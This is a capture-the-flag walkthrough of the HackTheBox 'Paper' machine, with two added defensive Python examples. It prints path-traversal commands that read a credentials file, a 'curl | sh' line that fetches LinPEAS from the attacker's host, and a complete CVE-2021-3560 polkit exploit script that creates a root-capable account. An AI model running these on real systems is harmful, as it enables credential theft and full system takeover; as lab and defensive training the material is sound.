HackTheBox Paper Writeup
Tackle the HackTheBox Paper Capture The Flag (CTF) challenge, an easy-level journey through web exploitation, subdomain enumeration, RCE, and privilege escalation. This concise writeup provides clear steps to help you develop essential Linux security skills through practical exercises.
Add Hosts
Edit the /etc/hosts file and add the following entries:
10.10.11.143 paper.htb office.paper.htb chat.office.paper.htb
This lets your machine resolve paper.htb and the two office subdomains to the box's IP address (10.10.11.143, as in the entry above).
Script to add hosts automatically
ip="10.10.11.143"
domain="paper.htb office.paper.htb chat.office.paper.htb"
grep -qF "$ip $domain" /etc/hosts || echo -e "$ip $domain" | sudo tee -a /etc/hosts
Mapping
nmap -sCV paper.htb
Starting Nmap 7.95 ( https://nmap.org ) at 2024-09-12 16:08 CEST
Nmap scan report for paper.htb (10.10.11.143)
Host is up (0.067s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey:
| 2048 10:05:ea:50:56:a6:00:cb:1c:9c:93:df:5f:83:e0:64 (RSA)
| 256 58:8c:82:1c:c6:63:2a:83:87:5c:2f:2b:4f:4d:c3:79 (ECDSA)
|_ 256 31:78:af:d1:3b:c4:2e:9d:60:4e:eb:5d:03:ec:a0:22 (ED25519)
80/tcp open http Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)
|_http-title: HTTP Server Test Page powered by CentOS
| http-methods:
|_ Potentially risky methods: TRACE
|_http-generator: HTML Tidy for HTML5 for Linux version 5.7.28
|_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
443/tcp open ssl/http Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)
|_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
| tls-alpn:
|_ http/1.1
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=Unspecified/countryName=US
| Subject Alternative Name: DNS:localhost.localdomain
| Not valid before: 2021-07-03T08:52:34
|_Not valid after: 2022-07-08T10:32:34
|_http-title: HTTP Server Test Page powered by CentOS
|_http-generator: HTML Tidy for HTML5 for Linux version 5.7.28
|_ssl-date: TLS randomness does not represent time
| http-methods:
|_ Potentially risky methods: TRACE
Subdomain Enumeration
While inspecting the HTTP traffic, the office.paper hostname turns up. Use gobuster's vhost mode to look for further virtual hosts:
gobuster vhost -u office.paper -w /usr/share/dict/SecLists/Discovery/DNS/subdomains-top1million-110000.txt
Exploiting WordPress CVE-2019-17671
The WordPress instance on office.paper is affected by CVE-2019-17671, which lets an unauthenticated visitor read unpublished (draft and private) posts by adding the static=1 query parameter. Visit:
http://office.paper/?static=1
One of the exposed drafts contains a registration link for the chat server of the form http://chat.office.paper/register/xxxxxxxxxxxxxxxxx (the token is not reproduced here).
After registering, message the bot. Its list and file commands resolve user-supplied paths without confining them to the bot's own directory, so relative paths reach dwight's home:
list ../../../home/dwight
file ../../../home/dwight/hubot/.env
Use the credentials found in the .env file to SSH into the target and read the user flag:
ssh dwight@paper.htb
cat /home/dwight/user.txt
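The two bot commands above work because the handler joins the user-supplied path onto a base directory and never checks that the result stays inside it. The following is an added example, not code from this writeup or from the box's hubot scripts (which are Node.js): it shows that flawed join next to a confined version that rejects both "../" escapes and absolute paths, and also checks the symlink-resolved path. The base directory /srv/bot/files is an assumption chosen for the example.

```python
import os


def resolve_unsafe(base, user_path):
    """Flawed resolution: join and normalise, but never verify the result.
    '../' segments walk out of base, which is exactly what the bot's
    list/file commands allowed."""
    return os.path.normpath(os.path.join(base, user_path))


def resolve_safe(base, user_path):
    """Confined resolution: return the absolute path if it stays inside base,
    otherwise None. Two checks: the lexical path (catches '../' and absolute
    paths) and the symlink-resolved path (catches links pointing outside)."""
    base = os.path.normpath(os.path.abspath(base))
    candidate = os.path.normpath(os.path.join(base, user_path))
    # Lexical check. An absolute user_path replaces base in os.path.join and
    # '..' segments are collapsed by normpath, so compare the common prefix
    # with commonpath (a plain startswith would accept /srv/bot/files-old).
    if os.path.commonpath([base, candidate]) != base:
        return None
    # Symlink check: a link inside base may point elsewhere on disk.
    real_base = os.path.realpath(base)
    real_candidate = os.path.realpath(candidate)
    if os.path.commonpath([real_base, real_candidate]) != real_base:
        return None
    return candidate


if __name__ == "__main__":
    base = "/srv/bot/files"  # assumed sandbox directory for the example
    for p in ["reports/q1.txt", "../../../home/dwight/hubot/.env", "/etc/passwd"]:
        print(f"{p!r}: unsafe={resolve_unsafe(base, p)} safe={resolve_safe(base, p)}")
```

The traversal string from the writeup resolves to /home/dwight/hubot/.env under the flawed join and is refused by the confined one; a normal relative path inside the directory still works.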
System Information Gathering with LinPEAS
Run LinPEAS to gather information for privilege escalation:
wget https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh
# Serve linpeas.sh from this machine's VPN (tun0) address and print the one-liner to run on the target
attacker_ip=$(ip a | grep -A 2 "tun0:" | grep -oP '(?<=inet\s)\d+(\.\d+){3}')
echo "now in the victim pc run -> curl http://$attacker_ip/linpeas.sh | sh"
sudo python3 -m http.server 80
rm -rf linpeas.sh
Exploiting CVE-2021-3560 for Privilege Escalation
Paste the following script into dwight's shell on the target to exploit the polkit authentication bypass (CVE-2021-3560):
#!/bin/bash
RED='\033[0;31m'
GREEN='\033[0;32m'
BLUE='\033[0;34m'
NC='\033[0m'
USR="pwn"        # account the exploit creates
PASS="root"      # password set for that account
TIME=""          # optional fixed delay; empty means measure it
FORCE="y"        # "y" skips the version checks at the bottom
# Measure how long a CreateUser call takes; the delay used below is derived from it
function fetch_timing(){
exec 3>&1 4>&2
out=$( { time dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:$USR string:$USR int32:1 2>&1 >/dev/null 2>&4 1>&3; } 2>&1 )
tmp=$(echo $out | grep -i "real" | awk -F '.' '{print $2}')
tmp_timing=$(echo ${tmp:0:$((${#tmp}-10))})
exec 3>&- 4>&-
echo $tmp_timing
}
# Halve the measured time
function calculate_timing(){
tmp_timing=$(echo $1)
t=$(awk "BEGIN {print `echo $tmp_timing/2`}")
echo $t
}
# Repeat the CreateUser call until the account exists; prints "uid,delay"
function insert_user(){
time_fetched=$(fetch_timing)
timing=$(calculate_timing `echo "0.$time_fetched"`)
if [[ $TIME ]]; then
t=$TIME
else
t=$timing
fi
while ! id "$USR" &>/dev/null; do
dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:$USR string:$USR int32:1 2>/dev/null & sleep `echo $t`s 2>/dev/null; kill $! 2>/dev/null
done
uid=$(id $USR | cut -d = -f2 | cut -d \( -f1)
echo $uid,$t
}
# Set the password hash on the created account with the same timing
function insert_pass(){
ti=$(echo $1)
u_id=$(echo $2)
hash1=$(openssl passwd -5 `echo -n $PASS`)
while true; do
dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts/User$u_id org.freedesktop.Accounts.User.SetPassword string:`echo -n $hash1` string:GoldenEye 2>/dev/null & sleep `echo $ti`s 2>/dev/null; kill $! 2>/dev/null
if [ $? -eq 0 ]; then
break
fi
done
}
# Driver: create the user, then set its password
function exploit(){
while true; do
echo -e "${BLUE}[!]${NC} Inserting Username $USR..."
ret=$(insert_user)
t=$(echo $ret | cut -d , -f2)
uid=$(echo $ret | cut -d , -f1)
if id "$USR" &>/dev/null; then
echo -e "${GREEN}[+]${NC} Inserted Username $USR with UID $uid!"
echo -e "${BLUE}[!]${NC} Inserting password hash..."
insert_pass $t $uid
echo -e "${BLUE}[!]${NC} Password insertion attempted!"
echo -e "${BLUE}[!]${NC} Try to login as the injected user using 'su - $USR'"
echo -e "${BLUE}[!]${NC} If login fails, run the exploit again."
echo -e "${BLUE}[!]${NC} If successful, use 'sudo bash' to gain root access!"
break
else
echo -e "${RED}[x]${NC} Insertion of Username failed! Retrying..."
fi
done
}
if [[ "$FORCE" == "y" ]]; then
exploit
else
echo -e "${BLUE}[!]${NC} Starting Vulnerability Checks..."
dist=$(cat /etc/os-release | grep ^ID= | cut -d = -f2 | grep -i 'centos\|rhel\|fedora\|ubuntu\|debian')
echo -e "${BLUE}[!]${NC} Detected Linux distribution as $dist"
ac_service=$(dpkg -l | grep -i accountsservice || rpm -qa | grep -i accountsservice)
gc_center=$(dpkg -l | grep -i gnome-control-center || rpm -qa | grep -i gnome-control-center)
if [[ $ac_service && $gc_center ]]; then
echo -e "${GREEN}[+]${NC} Accounts service and Gnome-Control-Center Installation Found!"
polkit=$(dpkg -l | grep -i polkit | grep -i "0.105-26" || rpm -qa | grep -i polkit | grep -i '0.11[3-9]')
if [[ $polkit ]]; then
echo -e "${GREEN}[+]${NC} Polkit version appears to be vulnerable!"
exploit
else
echo -e "${RED}[x]${NC} ERROR: Polkit version is not vulnerable!"
echo -e "${BLUE}[!]${NC} Aborting Execution!"
echo -e "${BLUE}[!]${NC} Use '-f=y' flag to force exploit."
fi
else
echo -e "${RED}[x]${NC} ERROR: Accounts service and Gnome-Control-Center NOT found!"
echo -e "${BLUE}[!]${NC} Aborting Execution!"
fi
fi
After exploiting, check the root flag:
cat /root/root.txt
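The script above creates its account through the AccountsService CreateUser call with accountType 1 (administrator), so on the CentOS target the new user lands in the wheel group (Debian-family systems use sudo), which is why 'sudo bash' works afterwards. From the defender's side the durable artefact of a successful run is an account nobody provisioned that holds admin-group membership. The following is an added example, not part of this writeup or of the exploit: it parses /etc/passwd and /etc/group style text, compares against a baseline of known accounts, and reports unexpected administrators. The sample files, the baseline, and the pwn entries are constructed for the example.

```python
# Admin groups AccountsService uses for accountType=1 (administrator):
# 'wheel' on CentOS/RHEL/Fedora, 'sudo' on Debian-family systems.
ADMIN_GROUPS = {"wheel", "sudo"}

# Constructed sample files for the example (not copied from the target).
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
dwight:x:1004:1004:dwight:/home/dwight:/bin/bash
pwn:x:1005:1005:pwn:/home/pwn:/bin/bash
"""
SAMPLE_GROUP = """\
root:x:0:
wheel:x:10:pwn
sshd:x:74:
dwight:x:1004:
pwn:x:1005:
"""
# Baseline of accounts the administrator knows about (assumed for the example).
BASELINE_USERS = {"root", "sshd", "dwight"}


def parse_passwd(text):
    """Map user name -> (uid, primary gid) from /etc/passwd-style text."""
    users = {}
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) < 7:
            continue
        users[fields[0]] = (int(fields[2]), int(fields[3]))
    return users


def parse_group(text):
    """Map group name -> (gid, set of supplementary members) from /etc/group-style text."""
    groups = {}
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) < 4:
            continue
        members = {m for m in fields[3].split(",") if m}
        groups[fields[0]] = (int(fields[2]), members)
    return groups


def find_unexpected_admins(passwd_text, group_text, baseline):
    """Return accounts absent from the baseline that hold an admin group,
    either as a supplementary group or as their primary group."""
    users = parse_passwd(passwd_text)
    groups = parse_group(group_text)
    gid_to_name = {gid: name for name, (gid, _) in groups.items()}
    findings = []
    for user, (uid, gid) in users.items():
        if user in baseline:
            continue
        held = {g for g, (_, members) in groups.items() if user in members}
        primary = gid_to_name.get(gid)
        if primary:
            held.add(primary)
        admin = sorted(held & ADMIN_GROUPS)
        if admin:
            findings.append({"user": user, "uid": uid, "admin_groups": admin})
    return sorted(findings, key=lambda f: f["user"])


if __name__ == "__main__":
    # On a live host, read /etc/passwd and /etc/group instead of the samples.
    for f in find_unexpected_admins(SAMPLE_PASSWD, SAMPLE_GROUP, BASELINE_USERS):
        print(f"unexpected admin account {f['user']} (uid {f['uid']}) in {f['admin_groups']}")
```

Run periodically against a baseline captured at provisioning time; a new non-admin account is deliberately not flagged, so the check stays focused on the privilege the exploit grants rather than on every user change.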